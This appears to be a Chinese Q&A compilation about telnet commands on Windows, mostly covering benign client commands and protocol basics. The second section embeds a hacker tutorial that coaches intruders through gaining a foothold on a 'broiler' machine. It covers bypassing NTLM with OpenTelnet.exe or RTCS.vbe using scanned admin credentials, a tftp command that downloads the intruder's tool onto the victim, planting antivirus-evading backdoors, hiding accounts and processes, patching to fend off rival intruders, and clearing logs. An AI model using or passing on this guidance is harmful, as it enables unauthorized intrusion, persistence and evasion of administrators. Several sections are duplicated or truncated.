cmdtelnet命令退出

㈠ telnet命令怎麼用，需要什麼埠

Telnet用於遠程登錄到網路中的計算機，並以命令行的方式遠程管理計算機。需要注意的是，遠程機器必須啟動telnet伺服器，否則無法打開telnet命令。telnet使用23端開口，命令使用入如下：

1）、"windows"+"R"快捷鍵打開運行窗口，輸入：「cmd」回車

Telnet 客戶端命常用命令：

open : 使用 openhostname 可以建立到主機的 Telnet 連接。

close : 使用命令 close 命令可以關閉現有的 Telnet 連接。

display : 使用 display 命令可以查看 Telnet 客戶端的當前設置。

send : 使用 send 命令可以向 Telnet 伺服器發送命令。支持以下命令：

ao : 放棄輸出命令。

ayt : 「Are you there」命令。

esc : 發送當前的轉義字元。

ip : 中斷進程命令。

synch : 執行 Telnet 同步操作。

brk : 發送信號。

quit ：使用 quit 命令可以退出 Telnet 客戶端。

㈡ 能不能介紹什麼是telnet啊，在cmd裡面的！！！！

TELNET命令

Telnet用於Internet的遠程登錄.它可以使用戶坐在已上網的電腦鍵盤前通過網路進入的另一台電腦已上網的電腦,使它們互相連通.這種連通可以發生在同一房間裡面的電腦或是在世界各范圍內已上網的電腦.習慣上來說,被連通計算機,並且為網路上所有用戶提供服務的計算機稱之為伺服器(Servers),而自己在使用的機器稱之為客戶機(Customer).一旦連通後,客戶機可以享有伺服器所提供的一切服務.用戶可以運行通常的交互過程(注冊進入,執行命令),也可以進入很多的特殊的伺服器如尋找圖書索引.網上不同的主機提供的各種服務都可以被使用.

使用Telnet的最簡單的方法是在命令行鍵入:

%telnet remote-computer-name(or IP)

這里使用的是UNIX系統的C shell,因為命令的選擇是百分號"%".如果使用的是其他的計算機系統(比如:Dos,VAX/VMS,Macintosh)命令,只在細節上有些差異,而在本質上是大同小異的,下面舉一個基本的Telnet使用例子:

telnet porky.math.ukans.e

Trying 129.237.128.11...

Connected to porky.math.ukans.e.

Escape character is '^]'.

SunOS UNIX(porky)

login:wl

password:xxxxxxx

Last Login: Tue Mar 28 05:35 from ns.bta.net.cn

SunOS Release 4.1.3_U1(SLIPPERY1) #3: Sun Nov 20 23:47:23 CST 1999

No match.

if:Expression syntax.

porky/serv/wl%ls

hello

porky/serv/wl%

porky/serv/wl%cd/

porky/%ls

Mail/ dev/ home/ mnt/ sbin/

usr/

News/ domain/ home1/ net/ serv/

var/

Record/ etc/ kadb* pcfs/ sys@

vmunix*

bin@ export/ lib@ print tmp/

boot gofer/ lost+found/ record tmp_mnt/

porky/%

上述的例子是用Telnet尋找一個叫做porky.math.ukans.e的遠程計算機.在找到這台計算機以後,已上網的擁護的計算機就成為它的一個終端.這時屏幕出現的對話與用戶在host上連接的終端一樣。用戶必須注冊進入(login)和注銷推出(logout).在login後,可給出任何適合遠程系統的命令,因為"porky.math.ukans.e"面向的是UNIX系統,所有標準的UNIX命令(想ls和pwd)都可以使用.當用戶從遠程系統退出時,也就從Telnet退出,便可以運行自己的本地系統.實際上,Telnet是一個可以注冊進入遠程計算機系統的工具.

一 摘要

Telnet的應用不僅方便了我們進行遠程登錄，也給hacker們提供了又一種入侵手段和後門，但無論如何，在你盡情享受Telnet所帶給你的便捷的同時，你是否真正的了解Telnet呢？

二 遠程登錄

Telnet服務雖然也屬於客戶機/伺服器模型的服務，但它更大的意義在於實現了基於Telnet協議的遠程登錄（遠程互動式計算），那麼就讓我們來認識一下遠程登錄。

1 遠程登陸的基本概念

先來看看什麼叫登錄：分時系統允許多個用戶同時使用一台計算機，為了保證系統的安全和記帳方便，系統要求每個用戶有單獨的帳號作為登錄標識，系統還為每個用戶指定了一個口令。用戶在使用該系統之前要輸入標識和口令，這個過程被稱為'登錄'。

遠程登陸是指用戶使用Telnet命令，使自己的計算機暫時成為遠程主機的一個模擬終端的過程。模擬終端等效於一個非智能的機器，它只負責把用戶輸入的每個字元傳遞給主機，再將主機輸出的每個信息回顯在屏幕上。

2 遠程登陸的產生及發展

我們可以先構想一個提供遠程文字編輯的服務，這個服務的實現需要一個接受編輯文件請求和數據的伺服器以及一個發送此請求的客戶機。客戶機將建立一個從本地機到伺服器的TCP連接，當然這需要伺服器的應答，然後向伺服器發送鍵入的信息（文件編輯信息），並讀取從伺服器返回的輸出。以上便是一個標准而普通的客戶機/伺服器模型的服務。

似乎有了客戶機/伺服器模型的服務，一切遠程問題都可以解決了。然而實際並非你想像的那樣簡單，如果我們僅需要遠程編輯文件，那麼剛才所構想的服務完全可以勝任，但假如我們的要求並不是這么簡單，我們還想實現遠程用戶管理，遠程數據錄入，遠程系統維護，想實現一切可以在遠程主機上實現的操作，那麼我們將需要大量專用的伺服器程序並為每一個可計算服務都使用一個伺服器進程，隨之而來的問題是：遠程機器會很快對伺服器進程應接不暇，並淹沒在進程的海洋里（我們在這里排除最專業化的遠程機器）。

那麼有沒有辦法解決呢？當然有，我們可以用遠程登錄來解決這一切。我們允許用戶在遠地機器上建立一個登錄會話，然後通過執行命令來實現更一般的服務，就像在本地操作一樣。這樣，我們便可以訪問遠地系統上所有可用的命令，並且系統設計員不需提供多個專用地伺服器程序。

問題發展到這里好像前途一片光明了，用遠程登錄總應該解決問題了吧，但要實現遠程登陸並不簡單。不考慮網路設計的計算機系統期望用戶只從直接相連的鍵盤和顯示器上登錄，在這種機器上增加遠程登陸功能需要修改機器的操作系統，這是極其艱巨也是我們盡量避免的。因此我們應該集中力量構造遠程登陸伺服器軟體，雖然這樣也是比較困難的。為什麼說這樣做也比較困難呢？

舉個例子來說：一般，操作系統會為一些特殊按鍵分配特殊的含義，比如本地系統將'Ctrl+C'解釋為：'終止當前運行的命令進程'。但假設我們已經運行了遠程登陸伺服器軟體，'Ctrl+C'也有可能無法被傳送到遠地機器，如果客戶機真的將'Ctrl+C'傳到了遠地機器，那麼'Ctrl+C'這個命令有可能不能終止本地的進程，也就是說在這里很可能會產生混亂。而且這僅僅是遇到的難題之一。

但盡管有技術上的困難，系統編程人員還是設法構造了能夠應用於大多數操作系統的遠程登陸伺服器軟體，並構造了充當客戶機的應用軟體。通常，客戶機軟體取消了除一個鍵以外的所有鍵的本地解釋，並將這些本地解釋相應的轉換成遠地解釋，這就使得客戶機軟體與遠地機器的交互，就如同坐在遠程主機面前一樣，從而避免了上述所提到的混亂。而那個唯一例外的鍵，可以使用戶回到本地環境。

將遠程登陸伺服器設計為應用級軟體，還有另一個要求，那就是需要操作系統提供對偽終端（pseudo terminal）的支持。我們用偽終端描述操作系統的入口點，它允許像Telnet伺服器一樣的程序向操作系統傳送字元，並且使得字元像是來自本地鍵盤一樣。只有使用這樣的操作系統，才能將遠程登陸伺服器設計為應用級軟體（比如Telnet伺服器軟體），否則，本地操作系統和遠地系統傳送將不能識別從對方傳送過來的信息（因為它們僅能識別從本地鍵盤所鍵入的信息），遠程登陸將宣告失敗。

將遠程登陸伺服器設計為應用級軟體雖然有其顯著的優點：比將代碼嵌入操作系統更易修改和控制伺服器。但其也有效率不高的缺點（後面的內容將會給予解釋），好在用戶鍵入信息的速率不高，這種設計還是可以接受的。

3 遠程登錄的工作過程

使用Telnet協議進行遠程登陸時需要滿足以下條件：在本的計算機上必須裝有包含Telnet協議的客戶程序；必須知道遠程主機的Ip地址或域名；必須知道登錄標識與口令。

Telnet遠程登錄服務分為以下4個過程：

1）本地與遠程主機建立連接。該過程實際上是建立一個TCP連接，用戶必須知道遠程主機的Ip地址或域名；

2）將本地終端上輸入的用戶名和口令及以後輸入的任何命令或字元以NVT（Net Virtual Terminal）格式傳送到遠程主機。該過程實際上是從本地主機向遠程主機發送一個IP數據報；

3）將遠程主機輸出的NVT格式的數據轉化為本地所接受的格式送回本地終端，包括輸入命令回顯和命令執行結果；

4）最後，本地終端對遠程主機進行撤消連接。該過程是撤銷一個TCP連接。

上面的內容只是討論了遠程登陸最基本的東西，其中的復雜和編程人員的艱辛是我們難以想像的，不知道你在舒服的使用Telnet的同時，是否想到了這些！

三 Telnet協議

我們知道Telnet伺服器軟體是我們最常用的遠程登錄伺服器軟體，是一種典型的客戶機/伺服器模型的服務，它應用Telnet協議來工作。那麼，什麼是Telnet協議？它都具備哪些特點呢？

1 基本內容

Telnet協議是TCP/IP協議族中的一員，是Internet遠程登陸服務的標准協議。應用Telnet協議能夠把本地用戶所使用的計算機變成遠程主機系統的一個終端。它提供了三種基本服務：

1）Telnet定義一個網路虛擬終端為遠的系統提供一個標准介面。客戶機程序不必詳細了解遠的系統，他們只需構造使用標准介面的程序；

2）Telnet包括一個允許客戶機和伺服器協商選項的機制，而且它還提供一組標准選項；

3）Telnet對稱處理連接的兩端，即Telnet不強迫客戶機從鍵盤輸入，也不強迫客戶機在屏幕上顯示輸出。

2 適應異構

為了使多個操作系統間的Telnet交互操作成為可能，就必須詳細了解異構計算機和操作系統。比如，一些操作系統需要每行文本用ASCII回車控制符（CR）結束，另一些系統則需要使用ASCII換行符（LF），還有一些系統需要用兩個字元的序列回車-換行（CR-LF）；再比如，大多數操作系統為用戶提供了一個中斷程序運行的快捷鍵，但這個快捷鍵在各個系統中有可能不同（一些系統使用CTRL+C，而另一些系統使用ESCAPE）。如果不考慮系統間的異構性，那麼在本地發出的字元或命令，傳送到遠地並被遠地系統解釋後很可能會不準確或者出現錯誤。因此，Telnet協議必須解決這個問題。

為了適應異構環境，Telnet協議定義了數據和命令在Internet上的傳輸方式，此定義被稱作網路虛擬終端NVT（Net Virtual Terminal）。它的應用過程如下：

對於發送的數據：客戶機軟體把來自用戶終端的按鍵和命令序列轉換為NVT格式，並發送到伺服器，伺服器軟體將收到的數據和命令，從NVT格式轉換為遠地系統需要的格式；
對於返回的數據：遠地伺服器將數據從遠地機器的格式轉換為NVT格式，而本地客戶機將將接收到的NVT格式數據再轉換為本地的格式。
對於NVT格式的詳細定義，有興趣的朋友可以去查找相關資料。

3 傳送遠地命令

我們知道絕大多數操作系統都提供各種快捷鍵來實現相應的控制命令，當用戶在本地終端鍵入這些快捷鍵的時候，本地系統將執行相應的控制命令，而不把這些快捷鍵作為輸入。那麼對於Telnet來說，它是用什麼來實現控制命令的遠地傳送呢？

Telnet同樣使用NVT來定義如何從客戶機將控制功能傳送到伺服器。我們知道USASCII字元集包括95個可列印字元和33個控制碼。當用戶從本地鍵入普通字元時，NVT將按照其原始含義傳送；當用戶鍵入快捷鍵（組合鍵）時，NVT將把它轉化為特殊的ASCII字元在網路上傳送，並在其到達遠地機器後轉化為相應的控制命令。將正常ASCII字元集與控制命令區分主要有兩個原因：

1）這種區分意味著Telnet具有更大的靈活性：它可在客戶機與伺服器間傳送所有可能的ASCII字元以及所有控制功能；

2）這種區分使得客戶機可以無二義性的指定信令，而不會產生控制功能與普通字元的混亂。

4 數據流向

上面我們提到過將Telnet設計為應用級軟體有一個缺點，那就是：效率不高。這是為什麼呢？下面給出Telnet中的數據流向：

數據信息被用戶從本地鍵盤鍵入並通過操作系統傳到客戶機程序，客戶機程序將其處理後返回操作系統，並由操作系統經過網路傳送到遠地機器，遠地操作系統將所接收數據傳給伺服器程序，並經伺服器程序再次處理後返回到操作系統上的偽終端入口點，最後，遠地操作系統將數據傳送到用戶正在運行的應用程序，這便是一次完整的輸入過程；輸出將按照同一通路從伺服器傳送到客戶機。

因為每一次的輸入和輸出，計算機將切換進程環境好幾次，這個開銷是很昂貴的。還好用戶的鍵入速率並不算高，這個缺點我們仍然能夠接受。

5 強制命令

我們應該考慮到這樣一種情況：假設本地用戶運行了遠地機器的一個無休止循環的錯誤命令或程序，且此命令或程序已經停止讀取輸入，那麼操作系統的緩沖區可能因此而被占滿，如果這樣，遠地伺服器也無法再將數據寫入偽終端，並且最終導致停止從TCP連接讀取數據，TCP連接的緩沖區最終也會被占滿，從而導致阻止數據流流入此連接。如果以上事情真的發生了，那麼本地用戶將失去對遠地機器的控制。

為了解決此問題，Telnet協議必須使用外帶信令以便強制伺服器讀取一個控制命令。我們知道TCP用緊急數據機制實現外帶數據信令，那麼Telnet只要再附加一個被稱為數據標記(date mark)的保留八位組，並通過讓TCP發送已設置緊急數據比特的報文段通知伺服器便可以了，攜帶緊急數據的報文段將繞過流量控制直接到達伺服器。作為對緊急信令的相應，伺服器將讀取並拋棄所有數據，直到找到了一個數據標記。伺服器在遇到了數據標記後將返回正常的處理過程。

6 選項協商

由於Telnet兩端的機器和操作系統的異構性，使得Telnet不可能也不應該嚴格規定每一個telnet連接的詳細配置，否則將大大影響Telnet的適應異構性。因此，Telnet採用選項協商機制來解決這一問題。

Telnet選項的范圍很廣：一些選項擴充了大方向的功能，而一些選項制涉及一些微小細節。例如：有一個選項可以控制Telnet是在半雙工還是全雙工模式下工作（大方向）；還有一個選項允許遠地機器上的伺服器決定用戶終端類型（小細節）。

Telnet選項的協商方式也很有意思，它對於每個選項的處理都是對稱的，即任何一端都可以發出協商申請；任何一端都可以接受或拒絕這個申請。另外，如果一端試圖協商另一端不了解的選項，接受請求的一端可簡單的拒絕協商。因此，有可能將更新，更復雜的Telnet客戶機伺服器版本與較老的，不太復雜的版本進行交互操作。如果客戶機和伺服器都理解新的選項，可能會對交互有所改善。否則，它們將一起轉到效率較低但可工作的方式下運行。所有的這些設計，都是為了增強適應異構性，可見Telnet的適應異構性對其的應用和發展是多麼重要。

上面討論了一些原理方面的東西，雖然我們在Telnet的使用過程中很難接觸到這一層面，但我認為了解這些是有意義的，它會給我們帶來許多啟示。下面讓我們來看看Win2000的Telnet服務。

（本系列教程不定期更新，欲獲得最新版本，請登陸官方網站：菜菜鳥社區 http://ccbirds.yeah.net）

四 Win2000的Telnet服務

其實從應用層面上，Win2000的Telnet服務並沒有什麼可說的，絕大部分內容你都可以從HELP文件中得到，我在此只是把它稍微整理一下而已。

1 基本配置

Win2000為我們提供了Telnet客戶機和伺服器程序：Telnet.exe是客戶機程序（Client），tlntsvr.exe是伺服器程序（server），同時它還為我們提供了Telnet伺服器管理程序tlntadmn.exe。

Windows 2000 默認安裝了 Telnet 服務，但是並沒有默認啟動。下面給出HELP文件中 Telnet 服務的一部分默認設置：

AllowTrustedDomain：是否允許域用戶訪問。默認值是1，允許信任域用戶訪問。可以改為0: 不允許域用戶訪問（只允許本地用戶）。

DefaultDomain：可以對與該計算機具有信任關系的任何域設置。默認值是"."。

DefaultShell：顯示 shell 安裝的路徑位置。默認值是： %systemroot%\System32\Cmd.exe /q /k

MaxFailedLogins：在連接終止之前顯示嘗試登錄失敗的最大次數。默認是3。

LoginScript：顯示 Telnet 伺服器登錄腳本的路徑位置。默認的位置就是「%systemroot%\System32\login.cmd」，你可以更改腳本內容，這樣登錄進Telnet的歡迎屏幕就不一樣了。

NTLM：NTLM身份驗證選項。默認是2。可以有下面這些值：
0: 不使用 NTLM 身份驗證。
1: 先嘗試 NTLM 身份驗證，如果失敗，再使用用戶名和密碼。
2: 只使用 NTLM 身份驗證。

TelnetPort：顯示 telnet 伺服器偵聽 telnet 請求的埠。默認是：23。你也可以更改為其他埠。

以上各項設置你可以使用tlntadmn.exe（Telnet伺服器管理程序）來進行非常方便的配置，配置後需要重新啟動Telnet服務。如圖1

2 NTLM

提到了telnet就不能不提NTLM，我想這也是讓入侵者最為頭痛的一件事，哪怕你獲得了管理員帳號和密碼，想簡單通過NTLM也並非易事，況且win2000中的telnet默認僅以NTLM方式驗證身份，這就讓我們不得不關注NTLM這個東東，那麼什麼是NTLM呢？

早期的SMB協議在網路上明文傳輸口令，後來出現了"LAN Manager Challenge/Response"驗證機制，簡稱LM，它十分簡單以至很容易被破解，微軟隨後提出了WindowsNT挑戰/響應驗證機制，即NTLM。現在已經有了更新的NTLMv2以及Kerberos驗證體系。NTLM工作流程是這樣的：

1、客戶端首先在本地加密當前用戶的密碼成為密碼散列
2、客戶端向伺服器發送自己的帳號，這個帳號是沒有經過加密的，明文直接傳輸
3、伺服器產生一個16位的隨機數字發送給客戶端，作為一個 challenge（挑戰）
4、客戶端再用加密後的密碼散列來加密這個 challenge ，然後把這個返回給伺服器。作為 response（響應）
5、伺服器把用戶名、給客戶端的challenge 、客戶端返回的 response 這三個東西，發送域控制器
6、域控制器用這個用戶名在 SAM密碼管理庫中找到這個用戶的密碼散列，然後使用這個密碼散列來加密 challenge。
7、域控制器比較兩次加密的 challenge ，如果一樣，那麼認證成功。

從上面的過程我們可以看出，NTLM是以當前用戶的身份向Telnet伺服器發送登錄請求的，而不是用你掃到的對方管理員的帳戶和密碼登錄，顯然，你的登錄將會失敗。舉個例子來說，你家的機器名為A（本地機器），你入侵的機器名為B（遠地機器），你在A上的帳戶是xinxin，密碼是1234，你掃到B的管理員帳號是Administrator，密碼是5678，當你想Telnet到B時，NTLM將自動以當前用戶的帳號和密碼作為登錄的憑據來進行上面的7項操作，即用xinxin和1234，而並非用你掃到的Administrator和5678，且這些都是自動完成的，根本不給你插手的機會，因此你的登錄操作將失敗。

由於Telnet伺服器對NTLM的使用有3個選項，所以當你Telnet遠地機器時，會顯示下面情況中的一種：

1)身份驗證選項=0時
=====================================
Microsoft (R) Windows (TM) Version 5.00 (Build 2195)
Welcome to Microsoft Telnet Service
Telnet Server Build 5.00.99201.1
login:
password:

\\為0時不使用NTML身份驗證，直接輸入用戶名和密碼，比如你可以輸入掃到的Administrator和5678

2)身份驗證選項=1時
=====================================
NTLM Authentication failed e to insufficient credentials. Please login withclear text username and password
Microsoft (R) Windows (TM) Version 5.00 (Build 2195)
Welcome to Microsoft Telnet Service
Telnet Server Build 5.00.99201.1
login:
password:

\\先嘗試 NTLM 身份驗證，如果失敗，再使用用戶名和密碼，其實這種方式對於我們來說，與上一種方式沒什麼區別

3)身份驗證選項=2時
=====================================
NTLM Authentication failed e to insufficient credentials. Please login withclear text username and password
Server allows NTLM authentication only
Server has closed connection
遺失對主機的連接。
C:\>

\\仔細看看上面的顯示，根本沒有給你輸入用戶名和密碼的機會，直接斷開連接，掃到了密碼也是白掃

所以對於入侵者來說，NTLM是橫在我們面前的一座大山，必須要除掉它，一般我們有如下幾種方法：

1通過修改遠程注冊表更改telnet伺服器配置，將驗證方式從2改為1或0；
2使用NTLM.exe，上傳後直接運行，可將telnet伺服器驗證方式從2改為1；
3在本地建立掃描到的用戶，以此用戶身份開啟telnet客戶機並進行遠程登錄；
4使用軟體，比如opentelnet.exe（需要管理員許可權且開啟IPC管道）
5使用腳本，如RTCS，（需要管理員許可權但不依賴IPC管道）

基本上是以上的5種，其中後兩種是我們比較常用的開telnet的手法，而且使用方法十分簡單，命令如下：

OpenTelnet.exe \\server username password NTLMAuthor telnetport
OpenTelnet.exe \\伺服器地址 管理員用戶名 密碼 驗證方式（填0或1） telnet埠

cscript RTCS.vbe targetIP username password NTLMAuthor telnetport
cscript RTCS.vbe <目標IP> <管理員用戶名> <密碼> <驗證方式> <tlnet埠>

五 在telnet中該做什麼

本來寫到上面就想結束了，不過許多朋友都說telnet上去後不知道該做什麼了，既然這樣，那我就拋磚引玉吧，這次不講具體做法，只是說說思路，什麼？為什麼不講具體做法？篇幅不夠嘛，以後我會一一解釋的。

1 查看系統信息

呵呵，其實就是隨處看看，看看他的系統配置和版本（用type c:\boot.ini來知道pro版或server版），看看都裝了什麼服務或軟體（從目錄名就可以知道了），看看有什麼重要或有趣的文件啦（唉，要是國外的機器，看也看不懂），看看他的用戶情況，總之就是盡可能多的了解系統，為一會裝後門摸底。

2 使用tftp傳送文件

想必大家都遇到過在telnet中傳輸文件的問題，因為我們習慣了在ipc管道中的文件傳輸，所以有些朋友喜歡用net share ipc$ 來打開管道，進而利用來傳輸文件。不過這樣反而麻煩，既然我們已經得到了shell，我們可以用TFPT命令來完成這一切，什麼是TFTP呢？

用TFTP(Trivial File Transfer Protocol)來實現文件的傳送是一種基於UDP連接的文件傳輸，一般是使用Windows自帶的tftp.exe和一個TFTP伺服器端軟體構成一個完整的傳輸結構。它是這樣使用的： 首先運行本地的TFTP Server（比如tftpd32.exe）軟體並保證始終開啟直至傳輸全部完成， 然後在telnet中（當然你也可以在其他shell中）運行下面的命令：
C:\>tftp –i ip get xinxin.exe c:\abc\xinxin.exe
其中ip為你自己機器的ip，且上傳文件要與TFTP伺服器端在同一目錄下，這樣你就可以把xinxin.exe上傳到c盤abc目錄下了（其實是從tftp伺服器下載來的）

需要指出的是，如果使用代理IP，你將不能實現與外部網路的文件傳送。因為你的代理網關在進行數據封裝的時候會將自己的IP地址加入到你的數據報中，代替你的內部網路地址，所以在外部網路進行MAC定址時是找不到你這台TFTP伺服器的。

3 安置後門

安置後門放在第二步好像早了點，如果你入侵還有其他目的，比如以破壞為主，或者是來修改主頁的，那麼這些事情當然可以在安置後門之前做；如果你只是想得到一隻肉雞，那就沒什麼可說的了，安後門吧。

後門的種類繁多，也給我們提供了很大的選擇餘地，能夠根據具體情況選擇合適的後門的確是一門學問。常用的後門一般有：木馬，asp木馬，遠程式控制制軟體，克隆帳戶，建立並隱藏帳戶，telnet，telnet擴展的shell，終端服務等。安置一個好的後門通常要注意以下幾點：

1 不會被防火牆查殺及阻礙通信：被加入病毒庫的後門最好加殼以逃過防火牆，盡量用低埠通信，以免被防火牆屏蔽。

2 最大限度增加隱蔽性：如果你選擇遠程式控制制軟體，要注意被控端的安裝提示和小圖標，以及是否同步畫面；如果你在帳戶上做文章，要盡量保持在cmd和用戶管理中都不出破綻；如果你選擇放木馬或telnet擴展，要注意文件和進程的隱藏；如果新開了終端服務（入侵前並沒有開），一定要該掉3389這個顯眼的埠，且越低越好。

3 不要當管理員不存在：這是一個大忌，許多朋友在只有默認帳戶的機器上建立類似'hacking'的管理員帳戶，真是無知者無畏呀。所以安置後門的時候，想想管理員疏忽的地方會在哪裡。

4 打補丁

如果想獨霸肉雞，就要會打補丁，要知道對肉雞的競爭是很激烈的。怎麼打補丁呢？這個也要問？想想你是怎麼進來的吧。算了，提示一下，除了修補大的漏洞以外（上傳官方補丁並運行），也要注意它的共享，ipc$共享（最好都關閉），可疑埠，容易被利用的服務等。不過打補丁也要注意隱蔽性的，不要讓管理員發現大的改動。

5 清除日誌

可以手動或利用軟體，如果不太會就去找相關教材吧，在這里我不詳細介紹了。

六 結束語

文章的前部分主要說了一些原理性的東西，後部分則側重於應用，寫的多了難免會有些遺漏，如果你覺得哪裡還需要補充，或者哪裡不明白，請回帖告訴我喲！！

㈢ telnet命令怎麼用

Telnet是進行遠程登錄的標准協議和主要方式它為用戶提供了在本地計算機上完成遠程主機工作的能力。可以用telnet命令來測試埠號是否正常打開還是關閉狀態。

1、點擊計算機的開始菜單--》運行 ，輸入CMD命令，然後確定。打開cmd命令行。

5、Telnet 客戶端命常用命令：

open : 使用 openhostname 可以建立到主機的 Telnet 連接。

close : 使用命令 close 命令可以關閉現有的 Telnet 連接。

display : 使用 display 命令可以查看 Telnet 客戶端的當前設置。

send : 使用 send 命令可以向 Telnet 伺服器發送命令。支持以下命令：

ao : 放棄輸出命令。

ayt : 「Are you there」命令。

esc : 發送當前的轉義字元。

ip : 中斷進程命令。

synch : 執行 Telnet 同步操作。

brk : 發送信號。

上表所列命令以外的其他命令都將以字元串的形式發送至 Telnet 伺服器。例如，sendabcd 將發送字元串 abcd 至 Telnet 伺服器，這樣，Telnet 會話窗口中將出現該字元串。

quit

使用 quit 命令可以退出 Telnet 客戶端。

㈣ 麻煩哪位大哥能告訴我telnet詳細的命令，比如我要在telnet上實現直接斷掉指定IP地址的連接

你在cmd下輸入telnet就進入該模式。

c:\>telnet
MIcrosoft Telnet>
通常telnet命令很簡單。
例如：
open 192.168.0.1 3389
是由連接對方IP號為192.168.0.1的客戶端，在3389埠上。
通常可以不填埠號。
退出telnet模式輸入quit就可以。

關於win7還有些其他命令。
c -close 關閉當前連接
d -display 顯示操作參數
set -set 設置選項
sen -send 將字元串發送到服務
st -status 列印狀態信息
u -unset 解除設置選項

㈤ 電腦cmd 裡面telnet 程序的命令...

telnet的常用命令

help聯機求助
open後接IP地址或域名即可進行遠程登錄
close正常結束遠程會話，回到命令方式
display顯示工作參數
mode進入行命令或字元方式
send向遠程主機傳送特殊字元(鍵入send?可顯示詳細字元)
set設置工作參數(鍵入set?可顯示詳細參數)
status顯示狀態信息
toggle改變工作參數(鍵入toggle?可顯示詳細參數)
^]換碼符(escape character)，在異常情況下退出會話，回到命令方式
quit退出telnet，返回本地機
z使telnet進入暫停狀態
<cr>結束命令方式，返回telnet的會話方式
以上是telnet的基本命令。對於不同的操作系統來說，這些命令也會稍有不同。如對VAX/VMS系統，其命令如下所示：
命令 等價命令
connect open
disable toggle
disconnect close
enable toggle
exit quit
resume <cr>
send send
set set
show display
下面是SET命令所有的9個參數及其功能說明。
參數 默認值 簡要說明 示例
AYT 「^T」 設「Are youthere」字元 SET AYT「A」
ESCAPE 「^]」 設置退出符 SET ESCAPE 「^X」
ERASE DEL 設置刪除符 SETERASE「^N」
ECHO 「^R」 設置回波符 SET ECHO「^B」
KILL 「^U」 設置kill letter SET KILL「^K」
FLUSHOUTPUT 「^O」 設置flushoutput符 SET FLUSHOUTPUT「^F」
INTERRUTP 「^C」 設置中斷符 SETINTERRUPT 「^I」
MODE CHAR 設置數據傳輸方式，有 SET MODE CHAR
TERMINAL VT100 字元方式和行命令方式
根據遠程系統的要求
設置終端類型 SETMODE LINE
SET TERMINAL/
DEVICE_TYPE
=VT100

㈥ telnet 命令 查找進程 和終止進程

可以直接先連接到telnet上，命令格式telnet IP（192.168.0.0）。然後會回饋你信息例如目標機是否開啟了telnet如果開啟的話輸入系統賬號密碼。這樣就連接到了對方的機器。操作查看進程和本機的CMD是一樣的。tasklist查看進程的PID，taskkill pid 用這個結束進程的PID。
Telnet是常用的遠程登錄手段，有兩種操作模式::Telnet命令模式和Telnet會話模式。連接到 Telnet伺服器後，Telnet客戶端會自動進入Telnet會話模式，此模式最常見。在會話模式下，所有擊鍵將通過網路發送到 Telnet伺服器，並可在 Telnet伺服器上由在該處運行的任何程序進行處理。
Telnet命令模式允許在本地將命令發送到 Telnet客戶端服務本身，例如打開到遠程主機的連接、關閉到遠程主機的連接、顯示操作參數、設置終端選項、列印狀態信息和退出程序。

㈦ telnet 命令使用方法詳解，telnet命令怎麼用

Telnet是進行遠程登錄的標准協議和主要方式它為用戶提供了在本地計算機上完成遠程主機工作的能力。可以用telnet命令來測試埠號是否正常打開還是關閉狀態。

1、點擊計算機的開始菜單--》運行 ，輸入CMD命令，然後確定。打開cmd命令行。

5、Telnet 客戶端命常用命令：

open : 使用 openhostname 可以建立到主機的 Telnet 連接。

close : 使用命令 close 命令可以關閉現有的 Telnet 連接。

display : 使用 display 命令可以查看 Telnet 客戶端的當前設置。

send : 使用 send 命令可以向 Telnet 伺服器發送命令。支持以下命令：

ao : 放棄輸出命令。

ayt : 「Are you there」命令。

esc : 發送當前的轉義字元。

ip : 中斷進程命令。

synch : 執行 Telnet 同步操作。

brk : 發送信號。

上表所列命令以外的其他命令都將以字元串的形式發送至 Telnet 伺服器。例如，sendabcd 將發送字元串 abcd 至 Telnet 伺服器，這樣，Telnet 會話窗口中將出現該字元串。

quit

使用 quit 命令可以退出 Telnet 客戶端。

㈧ 如何在命令提示符里運行telnet

若要啟動 Telnet 伺服器,請鍵入 net start telnet,若要停止 Telnet 伺服器,請鍵入 net stop telnet
點擊開始→運行→輸入CMD，回車
在出來的DOS界面里，輸入telnet測試埠命令： telnet IP 埠 或者 telnet 域名 埠，回車。如果埠關閉或者無法連接，則顯示不能打開到主機的鏈接，鏈接失敗；埠打開的情況下，鏈接成功，則進入telnet頁面（全黑的），證明埠可用。
Telnet 客戶端命常用命令：
open : 使用 openhostname 可以建立到主機的 Telnet 連接。
close : 使用命令 close 命令可以關閉現有的 Telnet 連接。
display : 使用 display 命令可以查看 Telnet 客戶端的當前設置。
send : 使用 send 命令可以向 Telnet 伺服器發送命令。支持以下命令：
ao : 放棄輸出命令。
ayt : 「Are you there」命令。
esc : 發送當前的轉義字元。
ip : 中斷進程命令。
synch : 執行 Telnet 同步操作。
brk : 發送信號。
上表所列命令以外的其他命令都將以字元串的形式發送至 Telnet 伺服器。例如，sendabcd 將發送字元串 abcd 至 Telnet 伺服器，這樣，Telnet 會話窗口中將出現該字元串。
quit ：使用 quit 命令可以退出 Telnet 客戶端。

㈨ telnet 命令使用方法詳解，telnet命令怎麼用

telnet
客戶端命常用命令：open
:
使用
openhostname
可以建立到主機的
Telnet
連接。close
:
使用命令
close
命令可以關閉現有的
Telnet
連接。display
:
使用
display
命令可以查看
Telnet
客戶端的當前設置。send
:
使用
send
命令可以向
Telnet
伺服器發送命令。支持以下命令：ao
:
放棄輸出命令。ayt
:
「Are
you
there」命令。esc
:
發送當前的轉義字元。ip
:
中斷進程命令。synch
:
執行
Telnet
同步操作。brk
:
發送信號。上表所列命令以外
的其他命令都將以字元串的形式發送至
Telnet
伺服器。例如，sendabcd
將發送字元串
abcd
至
Telnet
伺服器，這樣，Telnet
會話窗口中將出現該字元串。quit使用
quit
命令可以退出
Telnet
客戶端。
這是網上找的
操作方法：開始-運行－cmd
—telnet
192.168.1.1